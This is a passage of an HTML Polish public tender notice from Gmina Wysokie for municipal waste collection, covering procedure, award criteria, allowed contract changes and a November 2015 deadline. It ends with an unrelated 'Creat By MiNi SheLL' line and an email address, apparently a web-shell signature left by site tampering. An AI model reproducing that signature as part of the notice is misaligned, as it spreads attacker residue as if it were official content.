2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy przedłożyć dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, art. 23 ust 2 ustawy Pzp /jeśli dotyczy/. Pełnomocnictwo to musi zostać załączone w formie oryginału lub kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin płatności za zrealizowaną usługę - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w następujących przypadkach:
1)Zmiana przepisów prawa, w tym prawa miejscowego, wpływającej na zasady, sposób lub zakres odbierania odpadów komunalnych.
2)Zmiana instalacji wskazanej w § 4 pkt 8, 
3)Wysokość wynagrodzenia należnego Wykonawcy, ulegnie odpowiedniej zmianie w przypadku zmiany stawki podatku od towaru i usług o ile wykonawca udowodni, przedstawiając stosowne kalkulacje, iż ma to wpływ na koszty wykonywania niniejszego zamówienia przez Wykonawcę. 
4)Wysokość wynagrodzenia należnego Wykonawcy, ulegnie odpowiedniej zmianie w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę
ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę o ile Wykonawca udowodni, przedstawiając stosowne kalkulacje, iż ma to wpływ na koszty wykonywania niniejszego zamówienia przez Wykonawcę.
5)Wysokość wynagrodzenia należnego Wykonawcy, ulegnie odpowiedniej zmianie w przypadku zmiany zasad podlegania ubezpieczeniu społecznemu lub ubezpieczeniu zdrowotnemu lub wysokości stawki na ubezpieczenie społeczne lub zdrowotne o ile Wykonawca udowodni, przedstawiając stosowne kalkulacje, iż ma to wpływ na koszty wykonywania niniejszego zamówienia przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugwysokie.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wysokie, ul. Nowa 1, 23-145 Wysokie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.11.2015 godzina 10:00, miejsce: Urząd Gminy Wysokie, ul. Nowa 1, 23-145 Wysokie, pokój nr 12, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com